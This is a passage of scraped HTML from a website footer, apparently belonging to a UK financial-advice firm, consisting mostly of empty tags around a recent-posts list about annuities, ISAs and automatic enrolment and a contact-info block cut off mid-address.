</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n	</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n				</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<footer class=\"footer-area\">\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"avada-row\"><p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n			</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<section class=\"columns columns-3\">\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<article class=\"col\">\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>Our Latest Posts</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<ul>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n					</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n					</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n					</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n				</ul>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div style=\"clear:both;\"/></div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</article>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<article class=\"col\">\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>Contact Info</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div class=\"contact-info-container\"><p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n				</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p class=\"address\">Manchester &amp; 